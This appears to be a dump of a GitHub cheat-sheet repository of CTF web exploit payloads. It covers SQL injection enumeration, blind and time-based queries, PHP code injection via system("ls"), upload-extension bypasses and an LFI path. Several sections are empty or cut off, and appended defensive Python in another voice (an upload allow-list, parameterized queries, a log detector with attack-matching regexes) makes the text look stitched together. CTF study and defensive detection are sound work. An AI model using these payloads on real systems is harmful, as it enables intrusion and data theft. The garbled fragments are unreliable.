```
├── README.md
├── codeexec.md
├── lfi.md
├── sqli.md
├── xss.md
└── xxe.md
```

/README.md:
--------------------------------------------------------------------------------
# web-cheats
This repo is a collection of exploits (cheats) for web vulnerabilities encountered while participating in CTFs, wargames etc.

* [SQL Injection](https://github.com/rnehra01/web-cheats/blob/master/sqli.md)
* [Code-Injection](https://github.com/rnehra01/web-cheats/blob/master/codeexec.md)
* [XSS](https://github.com/rnehra01/web-cheats/blob/master/xss.md)
* [LFI](https://github.com/rnehra01/web-cheats/blob/master/lfi.md)
* [XXE](https://github.com/rnehra01/web-cheats/blob/master/xxe.md)

--------------------------------------------------------------------------------
/codeexec.md:
--------------------------------------------------------------------------------
###### `#` needs to be URL-encoded when a payload is sent through a URL

#### Beware of the following functions:
## eval

```
```

_[attack]_ = `URL?name=";system("ls");#`

## assert() - identical to eval()
```
```
_[attack]_ = `URL?name='.system("ls");#`

## preg_replace (with /e modifier) => preg_replace('/.*/e',...) - /e does an eval() on the match
```
```
_[attack]_ = `URL?pattern=/.*/e&new=system("ls")&base=something`

## create_function
```
'.$order.',$b->'.$order.');'));
?>
```
_[attack]_ = `?order=id);}system('ls');#`

include[_once] / require[_once]

Wildcard: a .php file can be uploaded past `preg_match('/\.php$/',$file)` by naming it `.php2` or `.php.blah`; Apache does not know how to handle the last extension, moves on to the next one and runs the PHP code.

--------------------------------------------------------------------------------
/lfi.md:
--------------------------------------------------------------------------------
### Some special paths

* `/proc/self/environ`. Another way to access it is via the symlink `/dev/fd` -> `/proc/self/fd`

--------------------------------------------------------------------------------
/sqli.md:
--------------------------------------------------------------------------------
###### In the following queries, `'` may not always work, so { **\`**, `"` } can be tested as well
###### To comment out the remaining code, { `;#`, `;--`, `;//` } can be used
###### When doing SQLi through URLs, { `;#`, `;--`, `;//` } need to be URL-encoded

### Finding the number of columns in a table _(Error-based SQLi)_
_[Vulnerable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`

* _[$input_user]_ : `' UNION SELECT 1,2,3.. FROM table_name --`
* _[$input_user]_ : `' ORDER BY n --` [If n gives an error, then n-1 is the number of columns]

### Limiting the number of rows
_[Vulnerable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`

* _[$input_user]_ : `' OR 1=1 LIMIT 1 --`

## For MySQL
_[Vulnerable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
###### Assume the number of columns to be 3
#### Finding version and databases
* _[$input_user]_ : `' UNION SELECT 1,@@version,database() --`

#### Extracting tables from databases
* _[$input_user]_ : `' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()`

#### Extracting columns from databases
* _[$input_user]_ : `' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()`
* _[$input_user]_ : `' UNION SELECT table_name, column_name, 1 FROM information_schema.columns`

### Fetching a particular column without knowing the column's name
* `SELECT F.4 FROM (SELECT 1, 2, 3, 4 UNION SELECT * FROM users)F;` will fetch the 4th column of `users`.

It works because the column names of the table derived from the subselect are the values of the leftmost `SELECT`.

## For MSSQL
_[Vulnerable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
###### Assume the number of columns to be 3
#### Finding version and databases
* _[$input_user]_ : `' UNION SELECT 1,@@version,db_name(i) --` [Here **i** is the i-th database present]
* _[$input_user]_ : `' UNION SELECT 1,@@version,name FROM master..sysdatabases --`

__[In MSSQL, if the second column is `username` then the payload `' UNION SELECT 1,1,name FROM master..sysdatabases --` won't work; the second column MUST be a string. Interesting !!]__

## For SQLite
In SQLite, __sqlite_master__ replaces __information_schema__

_[Vulnerable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
#### Extracting the SQLite version
_[$input_user]_ : `' UNION SELECT sqlite_version()`
#### Extracting table names
_[$input_user]_ : `' UNION SELECT name FROM sqlite_master WHERE type='table'`
#### Extracting column names from a table
_[$input_user]_ : `' UNION SELECT sql FROM sqlite_master WHERE type='table' AND tbl_name = 'table_name'`

## Blind SQLi
_[Vulnerable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`

* _[$input_user]_ : `' WHERE EXISTS(SELECT * FROM table_name WHERE username LIKE "%a%") --` [Asks whether any username contains the letter "a" or "A"]
* _[$input_user]_ : `' WHERE EXISTS(SELECT * FROM table_name WHERE username LIKE "__a%") --` [Asks whether the letter "a" is in the 3rd position or not]

Here `%` and `_` are wildcards: `%` matches any string and `_` matches exactly one character.

* By default, LIKE is __case-insensitive__

_[$input_user]_ : `' WHERE EXISTS(SELECT * FROM table_name WHERE username LIKE BINARY "%a%") --` [To make the search case-sensitive, use BINARY right after LIKE]

## Time-based Blind SQLi
_[Vulnerable code]_ : `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`
#### MySQL
* _[$input_user]_ : `' OR (SELECT SLEEP(10) FROM table_name WHERE username='something') --`
* _[$input_user]_ : `' OR IF(username='something',SLEEP(10),0) --`

[Produces a delayed response if username=`something` exists]
#### SQLite
* _[$input_user]_ : `' OR CONDITION='true' AND 1=randomblob(100000000) --`

[Produces a delayed response if CONDITION='true']

## Bypassing blacklisted chars
* `,` can be avoided using `JOIN`

`SELECT 1,2,3 FROM users` : `SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c`

* Bypassing a filtered `'` __[quote]__ (special case)

```
user = `\` & pass = `OR 1=1 --`
```

## Common-errs
* `mysql` compares strings case-insensitively by default and also ignores trailing spaces

How to exploit that?

A username `Admin` can be created and then used to sign in as `admin`.

--------------------------------------------------------------------------------
/xss.md:
--------------------------------------------------------------------------------
### XSS

* ``
* ``

--------------------------------------------------------------------------------
/xxe.md:
--------------------------------------------------------------------------------
#### XXE with SVG
```
]>
&xxe;
```
The result is displayed in the rendered SVG image.

--------------------------------------------------------------------------------
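The upload note at the end of codeexec.md shows why a deny-list check such as `preg_match('/\.php$/',$file)` fails: it inspects only the final extension and only the literal string `php`. The following is an added example and not code from the web-cheats repo: a Python mirror of that deny-list check beside an allow-list validator that inspects every dotted segment of the name and then stores the file under a server-generated name. The allow-list (`jpg`, `jpeg`, `png`, `gif`), the script-extension list and the sample filenames are assumptions made for this example. For context on the other sinks in codeexec.md: the `/e` modifier of `preg_replace` was removed in PHP 7.0, `create_function()` was removed in PHP 8.0 and `assert()` stopped evaluating string arguments in PHP 8.0, so those three matter on legacy PHP 5/7 installations, whereas the upload problem is independent of the PHP version.

```python
"""
Added example (not part of the web-cheats repo): upload filename checking.
Deny-list equivalent of preg_match('/\\.php$/') next to an allow-list
validator that defeats the `.php2` and `.php.blah` names from codeexec.md.
All names, lists and sample inputs below are constructed for this example.
"""
import re
import secrets

# Mirror of preg_match('/\.php$/', $file): only the last extension is
# inspected, and only the exact string "php".
DENY_RE = re.compile(r"\.php$", re.IGNORECASE)


def denylist_rejects(filename: str) -> bool:
    """The page's check; True means the upload would be blocked."""
    return DENY_RE.search(filename) is not None


# Allow-list: the extensions the application actually wants to serve
# (assumed here to be an image gallery).
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

# Extensions commonly bound to the PHP handler in Apache configurations.
# A name containing any of these in ANY position is refused, which is what
# stops `shell.php.blah`: Apache falls back through the extensions it knows.
SCRIPT_EXT = {"php", "php2", "php3", "php4", "php5", "php7",
              "phtml", "phar", "phps"}


def allowlist_accepts(filename: str) -> bool:
    """True only when every dotted segment is safe and the final
    extension is explicitly allowed."""
    # Drop any directory component the client may have sent.
    basename = filename.replace("\\", "/").rsplit("/", 1)[-1]
    parts = basename.split(".")
    if len(parts) < 2 or not parts[0]:
        return False                      # no extension at all, or a dotfile
    exts = [p.lower() for p in parts[1:]]
    if any(e in SCRIPT_EXT for e in exts):
        return False                      # shell.php.blah, shell.phtml.jpg
    if any(e == "" for e in exts):
        return False                      # trailing-dot tricks like "x.jpg."
    return exts[-1] in ALLOWED_EXT


def stored_name(filename: str) -> str:
    """Name to store the file under: a random token plus the validated
    extension, so the client-chosen name never reaches the filesystem."""
    if not allowlist_accepts(filename):
        raise ValueError("rejected upload name: %r" % filename)
    ext = filename.rsplit(".", 1)[-1].lower()
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    # Constructed sample names, including the two bypasses from codeexec.md.
    for name in ["photo.jpg", "shell.php", "shell.php2", "shell.php.blah",
                 "shell.phtml", "Shell.PHP.JPG"]:
        print(f"{name:16} deny-list blocks={denylist_rejects(name)!s:5} "
              f"allow-list accepts={allowlist_accepts(name)}")
```

Running the block shows the deny-list passing `shell.php2` and `shell.php.blah` while the allow-list refuses both; the random stored name additionally removes the attacker's control over the extension Apache will eventually see.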
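Every section of sqli.md is built on the same vulnerable query, `SELECT * FROM table_name WHERE username='$input_user' AND pass='$input_pass'`, and the "Common-errs" section adds the `Admin`-for-`admin` trick. The block below is an added example and not code from the web-cheats repo. It runs that query against an in-memory SQLite database twice, once assembled by string concatenation (the page's pattern) and once with bound parameters, using the page's `' OR 1=1 LIMIT 1 --` input; it then shows the registration-time uniqueness check and exact-match login that close the `Admin`/`admin` hole. The table, rows, plaintext `pass` column and all inputs are constructed for the demonstration; `COLLATE NOCASE` is used only to emulate MySQL's default case-insensitive comparison, and the trailing-space behaviour the page describes is emulated in Python.

```python
"""
Added example (not part of the web-cheats repo): the sqli.md login query
with and without parameter binding, plus the "Common-errs" username check.
Table, rows and inputs are constructed; plaintext passwords only mirror the
page's query (a real application stores a password hash).
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    # COLLATE NOCASE emulates MySQL's default case-insensitive comparison.
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                 "username TEXT COLLATE NOCASE, pass TEXT)")
    conn.execute("INSERT INTO users (username, pass) "
                 "VALUES ('admin', 's3cret'), ('bob', 'hunter2')")
    return conn


def login_concat(conn, user: str, pw: str):
    """The page's vulnerable pattern: input spliced into the SQL text."""
    sql = f"SELECT id, username FROM users WHERE username='{user}' AND pass='{pw}'"
    return conn.execute(sql).fetchone()


def login_param(conn, user: str, pw: str):
    """Same query with bound parameters: input is data, never SQL syntax."""
    sql = "SELECT id, username FROM users WHERE username=? AND pass=?"
    return conn.execute(sql, (user, pw)).fetchone()


def normalize(username: str) -> str:
    """Key under which a name counts as already taken. MySQL's default
    collations compare case-insensitively and ignore trailing spaces, so
    the uniqueness check folds both before an attacker can."""
    return username.rstrip(" ").casefold()


def register(conn, username: str, pw: str = "pw") -> bool:
    """Refuse a name that collides with an existing one after normalization."""
    taken = {normalize(u) for (u,) in conn.execute("SELECT username FROM users")}
    if normalize(username) in taken:
        return False
    conn.execute("INSERT INTO users (username, pass) VALUES (?, ?)", (username, pw))
    return True


def login_exact(conn, user: str, pw: str):
    """Parameterized lookup followed by a byte-for-byte comparison of the
    stored name, so a collation match ('Admin' == 'admin') is not enough
    to be treated as another account."""
    row = login_param(conn, user, pw)
    if row is None or row[1] != user:
        return None
    return row


def find_collisions(conn) -> dict:
    """Audit helper: usernames already in the table that collapse to the
    same normalized key, i.e. accounts registered via the Common-errs trick."""
    groups = {}
    for (u,) in conn.execute("SELECT username FROM users ORDER BY id"):
        groups.setdefault(normalize(u), []).append(u)
    return {k: v for k, v in groups.items() if len(v) > 1}


if __name__ == "__main__":
    c = make_db()
    bypass = "' OR 1=1 LIMIT 1 --"          # input from sqli.md
    print("concatenated:", login_concat(c, bypass, "x"))   # (1, 'admin')
    print("parameterized:", login_param(c, bypass, "x"))   # None
    print("register 'Admin':", register(c, "Admin"))       # False
    print("login as 'Admin' with admin's password:", login_exact(c, "Admin", "s3cret"))
```

The concatenated form returns the first row regardless of credentials because the comment marker discards the `pass` condition; the parameterized form searches for a username that literally contains the payload and finds nothing. `find_collisions` is the query to run over an existing user table before deploying the registration check.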
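Both sqli.md and codeexec.md stress that `#`, `;--` and similar characters reach the server URL-encoded, which is exactly why a log-side detector has to decode the query string before matching. As an added example (not part of the web-cheats repo), the block below classifies constructed Apache-style access-log lines carrying the page's own payloads: the rule names, the log format, the client address and the sample lines are all assumptions made for this example, and the rules are deliberately narrow starting points rather than a complete WAF signature set.

```python
"""
Added example (not part of the web-cheats repo): a small detector for the
payload markers listed in sqli.md and codeexec.md, run over constructed
access-log lines. Parameter values are percent-decoded (with '+' as space)
before any rule is applied.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Rules are applied to each decoded parameter value; hits are reported in
# this order. Names and patterns are constructed for this example.
RULES = [
    ("sqli-union",        re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("sqli-schema-enum",  re.compile(r"\b(?:information_schema|sqlite_master|master\.\.sysdatabases)\b", re.I)),
    ("sqli-time-based",   re.compile(r"\b(?:sleep|randomblob)\s*\(", re.I)),
    ("sqli-tautology",    re.compile(r"\bor\s+(\d+)\s*=\s*\1\b", re.I)),
    ("comment-tail",      re.compile(r"(?:--|#|;//)\s*$")),
    ("php-code-exec",     re.compile(r"\b(?:system|exec|passthru|shell_exec)\s*\(", re.I)),
    ("preg-e-modifier",   re.compile(r"^/.*/[a-z]*e[a-z]*$", re.I)),
]

# Request target out of a common-log-format line.
LOG_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(?P<target>\S+)\s+HTTP/')


def query_values(log_line: str) -> list:
    """Decoded values of every query-string parameter in the request."""
    m = LOG_RE.search(log_line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    return [v for _, v in parse_qsl(query, keep_blank_values=True)]


def classify(log_line: str) -> list:
    """Names of the rules that fire on any parameter value of the line."""
    values = query_values(log_line)
    return [name for name, rx in RULES if any(rx.search(v) for v in values)]


def scan(lines) -> list:
    """(line_number, hits) for every line that triggers at least one rule."""
    out = []
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            out.append((n, hits))
    return out


# Constructed sample log. Lines 2-6 carry payloads taken from sqli.md and
# codeexec.md, percent-encoded as a browser or curl would send them.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /login.php?username=alice&pass=wonderland HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /login.php?username=%27%20OR%201%3D1%20LIMIT%201%20--&pass=x HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /login.php?username=%27+UNION+SELECT+1%2C%40%40version%2Cdatabase%28%29+--&pass=x HTTP/1.1" 200 733',
    '198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /login.php?username=%27+OR+IF%28username%3D%27something%27%2CSLEEP%2810%29%2C0%29+--&pass=x HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /hello.php?name=%22%3Bsystem%28%22ls%22%29%3B%23 HTTP/1.1" 200 88',
    '198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /replace.php?pattern=%2F.*%2Fe&new=system%28%22ls%22%29&base=something HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Decoding first is the important design choice: matched against the raw request line, `%23` never looks like `#` and `%27%20OR%201%3D1` never looks like `' OR 1=1`. The `preg-e-modifier` rule matches any value shaped like a delimited regex whose flags contain `e`, so it will also fire on innocent values such as `/a/home`; tune such rules to the parameters that actually take patterns before relying on them.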